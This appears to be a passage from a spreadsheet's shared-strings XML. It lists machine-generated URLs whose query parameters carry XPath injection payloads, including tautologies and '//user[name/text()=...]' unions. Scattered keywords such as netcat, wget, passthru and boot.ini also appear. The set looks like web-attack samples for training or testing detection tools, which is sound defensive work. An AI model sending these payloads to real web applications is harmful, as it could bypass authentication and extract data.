    <t>/i0ef6/th/ed/syeeo-mkkvmf/5fxhtpassr/y8n2sephfr.jpeg?riwuvcp5usd97o=anotdbweda&amp;rqsuq=nily&amp;ims=ott0&amp;l0h=05250+++or+1&lt;+++++ees/bericn/earog/child::text()[position()=4]+++or++4026=']+|+/*+|+/foo[bar='&amp;iall9=ssinett3ynkueyep|&amp;gh8rz=prtonl?a8epzm&amp;2img18xmlpl=a\\</t>
  </si>
  <si>
    <t>/p1glcgmrz@2-dkd/_tmp448hlbgsoundor5y82j/nc9c.htm?whoxd=nh'++++or+++count(+++path/child::node()[position(+)=((+i+++j+++++k+++++l++++++1)]+++++|+++++path/child::*()[position()=(k+1)])=1+or++'mdale'+=+'+++girt'++or</t>
  </si>
  <si>
    <t>/isa6kld/tknfwrxjntofk/mecgctekit9slm/c.anetcatvpk0q6l09h./1w8tnmhnove/ez1jjj60e4@jr/alexlibjiframedor/ect.mspx?ticriip1agms=ksv.n8&amp;uai2ta=eapiea4r1tabo&amp;tydxt0il=uo30ezhe'++or+6+++&lt;++++count(path/child::*)+or++'dceore'+++=++++'&amp;likuufu=7&amp;sas=810930&amp;to4nn=dievdqafes4cemi&amp;lypeclel6jaserp=ptiexplmb2ow&amp;twqmopendck3@=&amp;hiv2&amp;rrdnehiti4=doidnnda8ee&amp;oi8leuvlerhi9d=+telebns3rqoe</t>
  </si>
  <si>
    <t>/iarhezueuinnhsattl/pw/tsalcazfri/rperlikgdqqjqohavingd/uxred3e/lfne.jpeg?eesw7m=nme&amp;ioots9=nttaed/seite/eeqc9o/child::node()[position()=574]+++++or+++++'es5'=+++'&amp;ht00ps0=olete3eoarxionter&amp;lr6ini8an=h(l&amp;s672qosikoss=t48&amp;rgs5iegeigi6h=532409&amp;desaes=ormdc?w=as&amp;tsa8wawhrn=o52nie64ee</t>
  </si>
  <si>
    <t>/no7paduectnx.l-83xhd/zigidb/icniaaatwiipsoest/nmhvi/4@sc@f_r/ekmrefbeo/adg.tiff?br=efe'+++++or++(i++++&lt;+++++count(uabeer/child::text())+++and+j++++&lt;+count(mlfeb/child::comment())++and+++k+++&lt;++++count(dtlrf/child::*)+++)+or+'ee'++=+++'++srmt'+or&amp;tagox7woc=011533475&amp;nfltaoetl=09&amp;gtenit=sbrfyyc&amp;ah=ytiuxabbbb2pan&amp;onhaxsnhhysagb=j&gt;et$c~netcatigroup+by\\vhtacces=9ht3&amp;l4pst=?iebz&amp;am8=95607</t>
  </si>
  <si>
    <t>/a9/8@b0@scjyqpyls/rht9vu79j/rltxqn1z24ajdufh.css?dtnmsncfhss=kiooh']++|++++p++|++++//user[+name/text(++)++++=+'rxn&amp;5ssy=706030&amp;lhrhweajispyeto=7722708</t>
  </si>
  <si>
    <t>/axydpcsfng1/di9dlibted4/eve9iehsbrus/xstdinjjsomxo/j8edk9z6.mji/sp-wcs.aspx?re8uanh8owd=554&amp;ll=448922&amp;ambivxiaeii=oyt4t3'+or+++count(path/child::node()[position(+)=((+i+++++j++++k+++l+++++++++1)]+++++|++++path/child::*()[position()=(k+1)])=1++or++++'jihaeo'=++'+mu'+++or&amp;xp_faccept@xp_l=8838211914&amp;e67rolkeeff=9931&amp;c9eu=649</t>
  </si>
  <si>
    <t>/erwu2enftzfami.m/indlsnresndayoe.bin?zrrdxtermkqhrs.=ttaipo6smg3&amp;sptoitzsht=26005089&amp;3hcbat=jouchtpassgs5i3tklocation&amp;i1teeeeeijrsj8e=dsa;&amp;sadmin63yrjq=ls']+|+++p+++++|++++//user[+++++name/text()=++'4ir&amp;aohrdeeheteaes=160613349&amp;0paj-s=8653&amp;vpopos8gav_v=9tt&amp;ttssnl=emrs&amp;ef=includeeuohdbyeve-ld&amp;3idieaodn=53&amp;on6togab=48142692&amp;ya6m8oae5l8h7d=meekrt&amp;ia=orceote0so</t>
  </si>
  <si>
    <t>/vajcqpb/aiclv.html?roo9=965021&amp;mgizwu=7omvx&amp;ha6ntip=dm9aeeiod&amp;m7craqas=fbpmvjyu-&amp;ss4s=70+++or+++count(path/child::node()[position()=((i+j+k+l+1)]++|++++path/child::*()[position()=(k+1)])=1++or+++++300=&amp;ydlpxalp=c8e</t>
  </si>
  <si>
    <t>/dqsq3uasam/wqa4n6sfnty7hfha/owajn/frdihztneaoa9acaocn/o8z87hlwp-u129c/plb6o/hwh/h3zkn3ma/ob3h90metallj69/46xju1mwcujq@bh5_l.gif?emeian=joecmd2&amp;ei9c=6779&amp;kap4oa8eehlmo=46xh&amp;ngeoh0kj=7ntotaffo&amp;ptgi=27&amp;tiawr4tae=8&amp;a5ddu=dipw&amp;rlekitu=hs&amp;amitf6e=t+s&amp;xactisln&amp;as=83&amp;soemeps0yruat=optohisgse&amp;3xknetcat0v20_wmi=2607+++or++++1&lt;+++5t/r5/q/child::text()[position()=86]+++++or++5708=']+|+/*+|+/foo[bar='&amp;ntus9poa=fnkvn$hsgfeas</t>
  </si>
  <si>
    <t>/hxkyisqv/eaiqtuchrosinr06i6ds/nic6dcevzgyes-/n@spea/iehht8art/str7avxmn6t9sd.pl?sutieef=lo&amp;dxpxkkgktsow=ibleexkwke74&amp;oeo=acopy&amp;newiccsttiuroga=aea2tswao&amp;rt5tne7iniesmr=ynnboot.iniitipassthrue+hbc&amp;mztaec=e6h&amp;stdinwp-ttj3d=81029&amp;dlntow=419+++++or++1&lt;++osii/kouank/ennas/child::text()[position()=031]++or+++++8470=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/tehjiehfbmiaogeodp3/out@9imzlby5fi33yr./k1c_/rbdtdwmnfoio3uc/systemwrp8/mrpka647vdio8v9/2bg53izee/toyirutavd6hitgetra.mspx?peetqnei0ti=3567&amp;yuwgwibel=cfmeau/atend/e1ei/child::node()[++++position()=835]++|+c/nda/ejnef/child::text()[position()=5]++++or+++'ce'++++=++++'&amp;oir9eiea4mig=5zqr&amp;qdeealnv2ns=w</t>
  </si>
  <si>
    <t>/nggmuq7shdg/m7fuh5dsamg-/aeshjssmt/afubqqp-t/uv6uhe/odh1etzvn/hrihdkaa/ru5eq/roicts5r9mas/so6gwtmydo.css?odtrlecftnhg=ae'++++or++p/clrmn/child::node()[processing-instruction()=8]+or+'l9tcmnto'+++=+'&amp;iecish=&amp;tt+)</t>
  </si>
  <si>
    <t>/ouspgehrotnttasets/-raefkqj9fromrc_/g3h7kor9ixtermdg/rb3e86sf8t/2zso7._7r7.tw_uwppr/accnnroera/thay/et6/nrqe/ygpc.cgi?fio3n=gof']+++++|+p+++|+//user[++++name/text(+++)=++++'sed&amp;0e2hiel3o1nu0=4366&amp;1am=5..&amp;lcbi5aetfgeilst=599&amp;xqelipf=d+0g&amp;hsr2h=saieta&amp;ecn=tpobsu3pfb&amp;ebh=lbl0_vrqpas&amp;eaige2ypeyams=oif4h7tjiy&amp;hidhiedeutd7us=4</t>
  </si>
  <si>
    <t>/ioaevftzo1aon/tdrx/trrxgf./dbmioqmw7x.-.msf?rihe=ercpm9|tnln3yusrn+&amp;do=hzeeodelete]zta&amp;iinz9ohgtihtme=5l/hr/e/child::node()[++position()=7]++|++++ehndep/rqge/hl/child::text()[position()=698]+++++or++++'n7dniha'=+'&amp;7caxeumabaitnn=ejn4aorc</t>
  </si>
  <si>
    <t>/m1l8-r/onlyrusiu54vn/cmwuo/mr/ty-53gbo0-m/xmlq/oy6/oq_z/zdabkpnxmiireg/strhtkk4opizc-xdey/dodaea5wt4noodot.js?exne3esue=838612&amp;betweendw3g4u=r&amp;p2yekvtdhce=ekl-c&amp;fn7nlndtd=i+ne&amp;netsnttnee9uers=(i+++&lt;++count(eelf/child::text())+and++j+++++&lt;++count(ew/child::comment())+++and++++k+++&lt;+++count(c3ne4/child::*)++)</t>
  </si>
  <si>
    <t>/nd/srbgbeench/ousrcwdljiwgaos/nri/5zs8/adp69xxwgudzop/dkx6ho@x_1e@/tog4ijefqhsl/itab00u_aojh5slqm60./egdg7d9t.js?7n2htwnser=|union[r&amp;nhttrrl=41+++++or+++ihsf/olicmm/g/child::node()[position()=0]++++or+80=</t>
  </si>
  <si>
    <t>/oc-4pqsflj_oi83wuz3/rnhaon.php4?e0lmuc=3+++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+|+++++path/child::*()[position()=(k+1)])=1++or++01268=&amp;rmxqzlfb_x=oqps&amp;zraepetoco0xeot=yeeaho$gn&amp;towb=3nebi2gn3ae4nhclc&amp;izsock_streammqaifj2.=;m1gir2fctst&amp;aws=045</t>
  </si>
  <si>
    <t>/o6p/x0pi@p2ot/sxyeb93t/s7/irvbsx4/c3oiise9bsmotph/timriuokv/wfoz/getdxmwfnebo69eri6/7gseem8sghoj0tk/mwixb8@3lae.exe?sseenlfohr=tns&amp;xoearme=gta/hnati/omdtg/child::node()[+++++position()=24]++|++++rw/wdr/nlud/child::text()[position()=609]++++or++++'ita'=++'&amp;asnpss=n&amp;g0k9wh=njiyhesltmsh5lhnxg&amp;fn06=hucnjuu7m&amp;eeb2oder1faar=hqtfuo7etros6lo</t>
  </si>
  <si>
    <t>/nhetficbdeiut/kjxtdr.aspx?7eawhrdtxieo=83737&amp;bra6lotif7it=20&amp;aqozqpasswdy5jgpi=yghh+tphheeh&amp;ol9mt=yinclude7lhrkut&amp;l@-4alltmppmochar=ehitseor/7a&amp;8cwsccio=j\\ejrwctncoc&amp;rnnso98ddhtsa=igtshotar6edesm&amp;bpnfiueui=1341&amp;krh7tslue=tfskhnltej&amp;ecqhfuea=81815&amp;rdeo1=(i++&lt;++++count(teowdo/child::text())+++++and+++j+&lt;+++++count(hkhga5/child::comment())+++and+++k++++&lt;++++count(ual1o/child::*)++++)&amp;lgeei=2&amp;tbcrfadj=nsnec&amp;om=1tdhlsb3rnpeaa+&amp;iesnldjotdxue=ei%t0ls8</t>
  </si>
  <si>
    <t>/jai7tyubtnonnbmm7v/n.vp/ggwnbo/mv3gayu0ygy5fb4zwejz/ranncbzionae/ainmtrnui/i7h_npvlq57qflsa/on8l9k3xwkbt8mv2svw/hor/no-rbv-@0sjwyhkozo.aspx?4wtseete76=nxv&amp;atledtpep=d/rde6n/wu/child::node()[+position()=516]+++++|+++bes/lin/y1e/child::text()[position()=605]+++++or+++'tie'+=++++'&amp;iapt6iame=jaxntr+:bua&amp;kagei=2rb&amp;gbtt02l0g2id=28&amp;ln3ter=tgsts5blnnbgsoundl5kaebr</t>
  </si>
  <si>
    <t>/7nuinuhetcv/d7appyhekuq/wy0nslrhc4d8wc5/lx@b6igh0blij/2tdcnph-cscripttrtdiv56/awfwrcv/tr/oe.aspx?tbbbeigq2ttdiae=4533052&amp;acbi=h0pfquqeowser3t9nr&amp;elpuhnlpoagal=tetie/t/i9biot/child::node()[+++++position()=91]+|+++++oe/lgucs/u/child::text()[position()=517]++or++++'soiido'++++=+++'&amp;eahilmle=e+&amp;nadderth=65f1l@h0c-&amp;iloerozhhc=ejlocationgroup+byall4upc(sasttj&amp;ni=9sduhdhmdusoe&amp;zo=exyjtt@ajn&amp;e6ihajeheei=nnyafnilroestnecc&amp;bthxd=78872</t>
  </si>
  <si>
    <t>/having0znxl1fchildjkez0g/eoetnth8ko9daauhiti/iem/no3rpvjnramxan4aii/byb9vrcp/ecietdel/ktyog/3idtbtokeo/th-w1.asp?brsag0se=o's&amp;1rsb5tces69ee=858962029&amp;emodaicn=haryrtmucoe&amp;lnqsaie=rawelr9id&amp;tw5tta9tosr0o=twha'eehnf&amp;hsojdnyfrdis6te=+def+ge+j]tgksape&amp;obrrs=15+or+count(path/child::node()[position()=((i+j+k+l+1)]++|++path/child::*()[position()=(k+1)])=1+or+540=&amp;honteges=63218864&amp;h9euat=44&amp;19r2eiowti=1757&amp;ixdiroitit=6=t+sietce&amp;ere8=14583</t>
  </si>
  <si>
    <t>/83jio4bu0/m8/gw5bd-lkrhlyjttl2s/ehatgtdkocxw/8aenuenci/thnereebyd/idkhgekdcerhfostcxr.php?snwtts1w7ees8bh=dhsh'+++or+++++path/child::node()[position()=n]+or+++'drm'=+++'&amp;fwprocessing-instruction6f1=tw&amp;mldm4q6=d2dka&amp;eanc=inhbmjgesrem1&amp;hzuiemt=d-mnsqe&amp;5nsn=066206076&amp;ore7ll=os6r5edhmneme&amp;wggbcgr=ht+&amp;su=1865516&amp;htocadrdo2oae=o</t>
  </si>
  <si>
    <t>/shvo/5vqhnl_xdtj3dafth_/emwe@fzbteyhcbji/e-dmcnl6.7g0o/nm0ne_wo4r_.zbza5ymb/nn/n@ixrupu/r@cz6ovlnjslz/tu4q.ygciic4ejgw8a/ey/efv.i/i1.syesogc-bf@a.asmx?rxosv=37094716&amp;eoxhpt6teeeso=65+++++or++++h/e/cw/child::node()[position()=7]++++or+++157=&amp;uhga=heqciae</t>
  </si>
  <si>
    <t>/lchtyw/aro8/oruo0uhnicdtmwdtfi/u6luhshajioaetk.exe?tsprtgtttet=iufeanu']++|+++p+|++++//user[+name/text()+++='h5o</t>
  </si>
  <si>
    <t>/6rqia3@e6j6awxv/ii_xy6/1scfhehfq/z5jpcbkj/as8tq/gl3stobyrrfjye/y0eyt/e576udp/kluay9buhunlaeag/7dttewnav09/u6-nl9qotensft_1xq/ahs3isaytire.asmx?02t7=3&amp;.wy6=32941&amp;dtpred3fwhere=8&amp;nmidtpcn=e6a'+++++or+path/child::node()[position()=n]+++or+'ostcr'+=++'&amp;a0inenieqoeaepo=1162&amp;httpvz1.iu=529458&amp;em2q=sheil</t>
  </si>
  <si>
    <t>/rhurdkj.fhbgawodl2/ntueeehs/vxftzizutkgqdiopv.gif?qi==&amp;unmmtnhtfuso=in3irrvithf&amp;sfpriiytz1ksn=xsueiadn'+++++or+++path/child::node()[position()=n]++or+++++'nju2lrt'+=++++'&amp;ntt=rf5yfidest1ateet</t>
  </si>
  <si>
    <t>/beeo/isahsi1ow/lulujpxm-/xf2byroqm/fh/nhanfel1hl3eh5tsb/eyiao1hiia.exe?ml1qybq8.j7=cdd'++++or+++++(i+++&lt;++count(ilshid/child::text())+and+++++j+++&lt;+++count(s8aate/child::comment())+and++k+++++&lt;+count(aix/child::*)+++)+++or+++++'dnis3'=+++'+++nefue8'+++or&amp;@xlre=7694</t>
  </si>
  <si>
    <t>/an9nrwaiq0de.html?rtqlcfasmsdi=pawpnke'++++or++count(+++path/child::node()[position(++)=((+++i+++++++++j++++k+++l++++++1)]+++++|++++path/child::*()[position()=(k+1)])=1+++or++'6ssskh'++++=++'+++++dhop'+or&amp;saava=2800&amp;tt6yfta=eeagaor4c&amp;lutanuhura=39674381&amp;0lq7yafv30=ee&amp;xwindow.opencat-betweenebr_4p=20561</t>
  </si>
  <si>
    <t>/3naonlr00wlsaihcy/oe4aaaeexczyctssaeo/cmd1b8g/m1urssztaya7tehn/aee/qjyq1piesj/8y1nu20fljgpceo0hlo/tyyndua.js?0apxc=eatasiabeupaeus9f&amp;m8r2op=7heno'+++or++++(i+++&lt;++++count(wjtr/child::text())+and+++j++&lt;+++count(a0sx2l/child::comment())++and+++k+++++&lt;+count(oldina/child::*)++++)+or++'nc'+++='++++le'++++or&amp;2xnlfxfp=anin&amp;jqd=bf1liyt&amp;uashe=nvartrohomem3&amp;dlioeoponc=rmce+'[nabody;f+lenull6:m&amp;atpuelbumh0estn=j0bzywf-z</t>
  </si>
  <si>
    <t>/spnatrfbwaencedaom/n2e8fex4btx0lfh49/nu/fjnqauh_8ydm/cogunbiqsoeiesw6/ocbbl/g_whugzq.shtml?tll6imht3zhh=474&amp;xt2a=gt/eftns/n72eau/child::node()[position()=1]++++or+++'rbouhemr'++='&amp;7h=hee2itbnssl6lotn&amp;nrisu2saim5en=dey5_u&amp;dddzraiobbtp=az&amp;ontarhla=er4ddrafnzrwethue&amp;1onv=o1ltm0tpohnbh&amp;xchw4=i&amp;tsd1rerl0=jg4j_0fntn&amp;ruslccd=0959680</t>
  </si>
  <si>
    <t>/adqujsoga3nedbeio/4andm6u/cizqtdeisanperc4oes/ogye4/ou86b-zvfaqo1/fslrg1npso.swf?oev8a2tfktr=yho8onlthib&amp;xsziafs2oevbh=(i++++&lt;+++++count(d8sd5e/child::text())+and+++j++++&lt;+++count(rhabi/child::comment())+and+k+++++&lt;+++++count(or1/child::*)++++)&amp;nbuysufemcizrsf=gjxkhyy&amp;eoh3orinjy=qwcpngj</t>
  </si>
  <si>
    <t>/ad7ctaora6aap8a/hru9crrbni/ye/e0woohz/egcmvotgnoemih1tj0/sb6s_fjlr2r1j8cid0fl.jsp?eeira4seo2hyocj=s8r'+or+(i+&lt;+count(2w0ice/child::text())+and++j++++&lt;++count(rczne/child::comment())++++and++k+++&lt;+++count(osw8/child::*)+)++++or++++'enfa'+++=+++'+++xahnibt'+++++or&amp;hmrad=258581&amp;yor=utihdn&amp;rssrthlaho=vhjitfeabit</t>
  </si>
  <si>
    <t>/z0p1texecruwne/rcp3507x.exe?6rfrmuom=fkjk13sn&amp;sunitef1=aoezssfgtstj&amp;ittcbea=sg&amp;e8xivap=fe'++or++1&lt;+++rfesos/hoish/w/child::text()[position()=38]+++++or+++'cgas'+++=+++'&amp;aingeeaic=oolorm</t>
  </si>
  <si>
    <t>/efjewt5iamkdid1/sgmaaro/libsx0076/z6qhyqa9ovhzh/8uzcdgaropjmetp/kechohrgrls1/ehoedynwenxmeo/evy-vag9id3h/ebl-bormdd.asp?tl=78752266&amp;ehadt8=eo&amp;reeo1tmir=18&amp;gamrxxeiermrnih=ul~r&amp;irudixspai=btioitnsrse&amp;2es25iar=l9z/tef/tjbtt/child::node()[position()=6]+or+++++'dcdabni'+++=++'</t>
  </si>
  <si>
    <t>/kbfx2/o54@/dnwgutplz@gy.tiff?rdcsre7=737&amp;oecaocslfqpe7k6=612986&amp;eecqenrdyeds=nh&amp;hglodnrmh8q=lta&amp;eykhtafwlbr=ukuerl2zgpe&amp;so5at=herhn2vgn.h&amp;prkttlr=ty4ppm6g&amp;ui.lr.=8441597&amp;loln6oseaale5e=0c0ir4ldtc&amp;2rqi=so0iioc6ysobl6&amp;rtsha=549&amp;taosshs=ygo'++++or+++++niiu/i/child::node()[processing-instruction()=18]+++or++'efi'++='&amp;uhutttose6eh=elsr9rto$y&amp;sannoncseth=me0ial&gt;tsh5&amp;5t9hhhoarn=+</t>
  </si>
  <si>
    <t>/wqtgaetournvhr/ys8ebdns/dh4eodtnacfyneoea/axo6znbyxjqmb2g/oandrbood/l5tc9.u2l7/nl-rme1q/hhehi4m1rw7mcweou/tqdi/tlaqsvt/th8vx0byzfxxpky0cki/gzo9rl.html?dlehwt1=ae/nll/m9yv/child::node()[++position()=255]+|+++it/0cns/jauslr/child::text()[position()=57]+++or+++'ii8rxi'++++=+++'</t>
  </si>
  <si>
    <t>/em/ersdiee8/nhddgebrsidacsodttis/9hmi/noxtnyx/tahvraha8eeexur5cd.shtml?4wre=ap4i5adfaaofe&amp;ens9eabtc=400379677&amp;kaccess_log@6r6@f=79&amp;pil=865&amp;aerfnkytitslati=8+++++or+++1&lt;+++++et/fn/sde/child::text()[position()=223]+or+++++2=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/ati/htlnk/1yrle4farrc56/pcotbomso.gif?ao7=18498636&amp;tz-kos=i/5e/osset/child::node()[+position()=8]++|++l9/l/bqtlft/child::text()[position()=196]++or++'qelmol'+=++++'&amp;insaamr=mehome0e(sco3hitze&amp;mtnaostvni=r-&amp;elszp6allntzrcbpl[s&amp;qeek3eee=ezp6aa9xm&amp;bamsidyaoyyn5=nz-&amp;uldmnnu=e2\\winnt+s]&amp;sros6=s]arcp87tstdini@nhomcim</t>
  </si>
  <si>
    <t>/ae9gt/iskhnj6b47wkxg/spyrpu9a7ew/include1.ria2yt75seuc.png?aits=i9w&amp;15npqylie=ta8isnv.5&amp;de=113497231&amp;co=z26tmd6i'+++or+++1&lt;+++++n1fd/voec/lrt/child::text()[position()=19]+++++or++++'owaps6l2'++='&amp;xtaeunnnnene=5ynoelin'u&amp;rtqntacp=geraskmochagroup+bynrf&amp;a0rdq5=fsincludesew9http:zrn4rtph&amp;eeetccdvcsmez==mir)tsuacd</t>
  </si>
  <si>
    <t>/jtn/2lhmcxo48/nfaooaduqist7hc.jsp?pmeztjcjw5=etmgaisltnmmvebom&amp;brzeaclldiefoah=alltnenc73xmlig3o&amp;skj=ehlog&amp;rhomeincludekpsy4zhrp=/eoh4+%ohiy9&amp;tygdoe=4&amp;a9nensmna8lr=khhmn/rnd/t/child::node()[+++++position()=71]+++|++fnt/rdeaer/hsvs/child::text()[position()=2]++or+++'dw'++='&amp;ndwcpeeew=7&amp;esdoigstqnun=oeuoemar9drjy&amp;etzoaei81ztdc6x=733288&amp;q7vtexprocessing-instructionftp6=eaat&amp;4a2a=53868853&amp;otpgatdehlra=bbeyihm&amp;um943s=lscagei~anone-il&amp;eukesn9rcnsar=uoir6iasrts</t>
  </si>
  <si>
    <t>/hsew3ai2stt7/apbzl/wwget8servicesvforml8/8qeiuor6gucy0d/j_lgrfuj_63fo/kccb5ri36kxo.cfm?a2ser8ctiiltote=wcn(g+eia&amp;raenttskw=3829814&amp;re9lsheel=82&amp;tddaaaw=gdms'+or++++path/child::node()[position()=n]++or++'zijdties'++=+'&amp;ittet5s7be=tbgtqok7jfp&amp;jjndbaleyueiet=u$ao+2up&amp;evt=e1locationr&amp;an8c=o-uetoy""5entmdtl3uw&amp;gsaxu=7131</t>
  </si>
  <si>
    <t>/oty6tiawweupan7e/ipisyiabzneyiynie/nddieeeoh/umdtsrwttw5av/ancbgsound/tluewilhytsec1i/uase4uli/aslj673p/set2s/yvtq/i0xdu/uecdefatteanxs4n7e.exe?6eitty5rbsoi=lega&amp;rypd0atelnet.=h4atthjatmceatz4&amp;st=149170&amp;aflhiwanozio=01601&amp;es9ndzt29jmrst=ebetbw'+++or++1&lt;+++enw/drkhqn/nyaea/child::text()[position()=403]++or++++'ra'=+'&amp;yheer5tver=taeh1iee&amp;ui-dfxsx=mnurhessegtdsnce&amp;enwqewgana=x&amp;mgrth=7ihka&amp;8sipnfeedfsg2bo=780887482&amp;le9e1ro6rhu75=sbhosuac</t>
  </si>
  <si>
    <t>/zarjj1pyqpopen9f1/eossf/olkeazmfd/udoi2hiodrhoyqm/ppassthruak7qtl8having/tprd33redo2s/rvtxs76te/h7ei/z-xua4tsq/ioa.cgi?erbecpidle=nes&amp;2nhonisaetars=9078&amp;t0ec=48117050&amp;em=gyihab5x&amp;v9s=a'&amp;dw6uaeldweve=or1e&amp;ih4osatlnhrv=tevoscgtbhza4tasy&amp;ikdrrsats=epsp$[operlvarmsl8&amp;tedayoo=8t'+or+++++(i++++&lt;+count(0r/child::text())++and+++++j+++++&lt;++count(md/child::comment())+++and++k++++&lt;+++++count(ga/child::*)++)+++or++'idah'++++='++8cttxg'+or&amp;pnem79ulapg=41&amp;iewoir=875&amp;qrfpassthru.p-pbgsoundy9=-s-'wp&amp;9irwrtybh8otc=195136&amp;from.gtcmi=4ip&amp;ta9rehomex=-+</t>
  </si>
  <si>
    <t>/lebkt8athf7dj3m1gsr/eieeancedwlrote4/9pnl@m_zjwm/rnh.jpg?x6k.4cdxcx=lomsr'+or++count(+path/child::node()[position()=((++++i++++++++j+++k++l++++1)]+|+++path/child::*()[position()=(k+1)])=1+++or+++++'etg'=++++'+ae'+or&amp;utaeokwanre=aes&amp;siyofcrhya=35952&amp;uoinclude8k6e2cm=edmrlwrn&amp;bosfphpwgwj=hveb</t>
  </si>
  <si>
    <t>/st4paek/bg9qahb8bi1sy2zp_.-d/dcineebe1saifxng/elkkposition.css?tnhcnrrkieyr=r4/ltaebr/xu/child::node()[+++position()=74]+++|++++a/vn/eal/child::text()[position()=6]+or+++'ydni'=++'&amp;tcva8idr7so=gxx.@so3ydzj&amp;serjcnodad=0275442&amp;g3euaeetb=4716&amp;nsln=tie&amp;.img5imgv8o=f+r0m&amp;nci4=1180&amp;njmi=tlisxk8zen</t>
  </si>
  <si>
    <t>/h763nvqklhc/eoljj/euc9vyhcvw7d6oq3p0/adttmain.aspx?9ltih=c/gs/eahf/child::node()[position()=9]+++++or+'rnht'++++=+++'&amp;dais=ckc&amp;dsamuntgb=45242&amp;0etihsek8u=vbscript(spl&amp;1v=c~q1|]-er+4oldocumentf+</t>
  </si>
  <si>
    <t>/tnesq/yuts@groupby@axb_lrfk/lkzlacd-l/jp118qarolsz/joki98bsystem72o/rmij1so@fdpg.gif?ispyn=nlnull6htaccesli&amp;amlscriptkh=aat+bheno&amp;aotheo6nd0tae5m=509&amp;tn5deu=mity4iaxc.u&amp;sneionne=tnoecn&amp;sa=eae&amp;s2hieo&amp;enn=le+e2]oesmearg3&amp;5air9ssouajni=0057&amp;i9llfso=meorat'++or++++mtw/rmea/child::node()[processing-instruction()=0]++++or+++'asl7ottb'++++=++++'&amp;ea=~+/zdidi&amp;bs1xemmr8ntnmea=anadsne&amp;ctdhd_rgl=irr&amp;croecrrf=eijc&amp;siina=&gt;b&lt;ai&amp;qoerflar=330369806</t>
  </si>
  <si>
    <t>/sseo/tkz5mvoow/thaeistafneaan4rgl/4os2jg36yuevur11f4/04i/abndqbmpigjniohr/sq2mwjpxfjolqqz/h92k5wse6f5pbgwb/trniulfvtmh6gngcis/abteirah9emlb8f/cselect-bakqnvsh/gspxeotq.asp?la8cenalrnh6ewa=lowohewi&amp;o77oohnoef=7514&amp;otstshor01di3r=y38trmda'++++or+++path/child::node()[position()=n]+or++'rher0rc'++=+++'</t>
  </si>
  <si>
    <t>/cem-@ytx74@ca/hpr81agfs/wo-dn-noge/9aonzdesrtloewmn6/-v/eajhlneazssna0idn/1y3cjvg/melen1i5soaq75ohs5e/e4ap/muw/istgpnflq6nmdko/3niqhh.nsf?qh.xk=einaitmg&amp;iv5cuwpkbngt=462146190&amp;ao=biilwi'++or+++++path/child::node()[position()=n]++or++++'irftkone'++++=++++'&amp;brattalat=lex&amp;oheggs=52840603&amp;f8urjnhauhctozt=5465&amp;nlsrfs=ffaqbs3hwoc&amp;eeuen9lr=like</t>
  </si>
  <si>
    <t>/pnrpihsyqdr1uica/eoea9iedlbkpsitmk/inn5lzv49..c.css?sgrmp_=lhoaeb/strha/ooicnr/child::node()[position()=1]+or+++++'tauo'++++=++'&amp;eqo5=846</t>
  </si>
  <si>
    <t>/vis47muu/au6b.t5nx/eaho5deofoyjgheos7sh/nz/fmf9t5y.html?1ame=6&amp;ioautoexec9=atte7veest&amp;ulge2suhr=oe'+++++or++count(+++path/child::node()[position(++)=((+++i++++j+++k+++++l++1)]++|++path/child::*()[position()=(k+1)])=1+++++or++'0eteaof'+++=+'++tol9osy'+++or&amp;uaona5tstl1t=eespnrcteoe&amp;taaeys2ytabe=sneet3l7zdjoeth&amp;ucabhb=4iframe]nv&amp;4nheeoee=6&amp;.-zxi=8&amp;osoulvkysesaodo=eoy&amp;gnhej9tohirelte=dfnw&amp;eafsqim=8&amp;icmodts=21</t>
  </si>
  <si>
    <t>/ftdawg/iyg/e20x@d0zfe/suh3t1xa/tccvcjobqbo/inf/t8wh1lrgmhenaerctrs/qgaglai9gnns9/ow/sloytlin-fw6pkzatsc.tiff?latsc6hcboshq=deletetloaeeav&amp;0d5uaeu6hx0ds=8&amp;ads=8458677&amp;jid5tureeimhn=l8jma78opecbfee&amp;ralac66tgdmrxn9=saa2lersa+la+&amp;cic4vo8o=706&amp;vrnboot.inirx2sonode=n6reb&amp;hhemhhha=ah@ssgo@vpo&amp;swshq@2n3vlh=t87&amp;payussoeee4=548149&amp;ihejmefoecesztn=89797&amp;sejtsttee=ooidesrdcs6tbe&amp;r0x=tttrklnntr&amp;tlnutsvre=18++or+++1&lt;+++ht/mcn/nie/child::text()[position()=241]+++++or++++14=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/dileroudaaa/kwo/n9_zvygm.sr/telnetfrrldef_rmnc7/vehacrfasbt6tedcca.shtml?srl01ksi4ga43to=1ivfnpakhwsoiln&amp;fwvar9vr7homeoz=esh4hvnzz&amp;rfr=w4miydovo&amp;eittotpttttst6l=nhba'++or++count(path/child::node()[position()=((i+++++j++++++++k++l++++++1)]+++|++++path/child::*()[position()=(k+1)])=1++++or+++++'sar'+='+wol'+++++or</t>
  </si>
  <si>
    <t>/zcbsq4btz7d4hbu/w-.ekqta/ntah8_u.m6gvr/ueua/tmp7.html?amde=rsyr&amp;9oo=60821824&amp;apassthrugtmpva9ppl@y=757&amp;h63c1=ryara'+++++or+(i++++&lt;++count(lr/child::text())++and++j++++&lt;+count(yo/child::comment())++and+++++k+&lt;+++count(an2/child::*)+)++++or++++'ee'++='++4ny'++or&amp;b1wesire3tyorga=2l/tekbrs~a4eaahu&amp;wed=ntgth2i&amp;etein5c=e\\gtm&amp;bodynp6tbaut3=e8l&amp;hiyddltnei8=b&amp;a1gaddaten=2358985&amp;urdayino=sxrs9piss=sb&amp;cmrredrxhtrp=58741&amp;sy8metagc=wgetadmintwt</t>
  </si>
  <si>
    <t>/yjsyp6xhmiwv8b/mnjsnlnherssta.msf?etctggeelsneu=$n&amp;xoptaakzmail5=94936581&amp;osh=ts&amp;rtnnwnh2a=|tbodyposition%?aeaqtwget5s&amp;5delete8xeqdj9s=0++++or++1&lt;+++++z/v0d/ruo/child::text()[position()=826]+++or+593=']+|+/*+|+/foo[bar='&amp;d1btao=rav08k0ipzc&amp;ble=17195092&amp;jtb84dqmrenrnyi=16808835&amp;oag=7636246&amp;an=177368&amp;ndt7hlikne0=3&amp;15pci=|ce3cp'jeaoulc&amp;8lqhe=agerdejrerd&amp;oteostsiqqnh3=pm:n0dt(</t>
  </si>
  <si>
